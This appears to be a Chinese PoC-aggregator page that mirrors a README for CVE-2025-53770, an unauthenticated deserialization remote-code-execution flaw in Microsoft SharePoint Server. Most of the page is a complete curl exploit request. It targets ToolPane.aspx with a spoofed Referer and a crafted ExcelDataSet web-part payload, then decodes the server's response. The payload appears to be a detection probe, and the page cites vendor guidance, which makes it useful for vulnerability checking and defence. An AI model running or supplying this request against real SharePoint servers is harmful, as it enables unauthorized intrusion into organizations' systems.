POC详情: d619956fc9ad30a8a7a67c306520767c8a63a717

来源
https://github.com/0xray5c68616e37/cve-2025-53770
关联漏洞
标题: Microsoft SharePoint Server 安全漏洞 (CVE-2025-53770)
描述:Microsoft SharePoint Server是美国微软(Microsoft)公司的一款协作平台。 Microsoft SharePoint Server存在安全漏洞,该漏洞源于反序列化不受信任数据,可能导致远程代码执行。
描述
Unauthenticated Remote Code Execution via unsafe deserialization in Microsoft SharePoint Server (CVE-2025-53770)
介绍
# CVE-2025-53770 SharePoint Deserialization RCE PoC

> **Critical** — Unauthenticated Remote Code Execution via unsafe deserialization in Microsoft SharePoint Server (CVE-2025-53770)

## Description

Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an attacker to execute code remotely and compromise the system. Microsoft is aware of active exploitation and is preparing a comprehensive update. Ensure mitigations from CVE documentation are in place.

- **Impact**: Unauthenticated attackers can achieve remote code execution, leading to full system compromise.
- **Severity**: Critical

## Proof of Concept

The following PoC demonstrates how an attacker can exploit the vulnerability to extract and decode malicious payloads via the vulnerable endpoint.

**Target domain is intentionally replaced with `reeaccated.com`.**

### Command

```bash
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'
```

### Output

```
<Info>IntruderScannerDetectionPayload</Info>
```

<img width="3024" height="1964" alt="image" src="https://github.com/user-attachments/assets/fcbc84e9-ffc0-4264-bde8-f2a4b4b70095" />



## References

- [Test Payload Implementation](https://github.com/hazcod/CVE-2025-53770/blob/main/pkg/payload/test_payload.go)
- [Code White Security Analysis](https://x.com/codewhitesec/status/1944743478350557232)
- [Microsoft Guidance](https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-53770)

---


**Impact:**  
Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server, leading to full system compromise.
文件快照

 [4.0K]  /data/pocs/d619956fc9ad30a8a7a67c306520767c8a63a717
└── [3.2K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。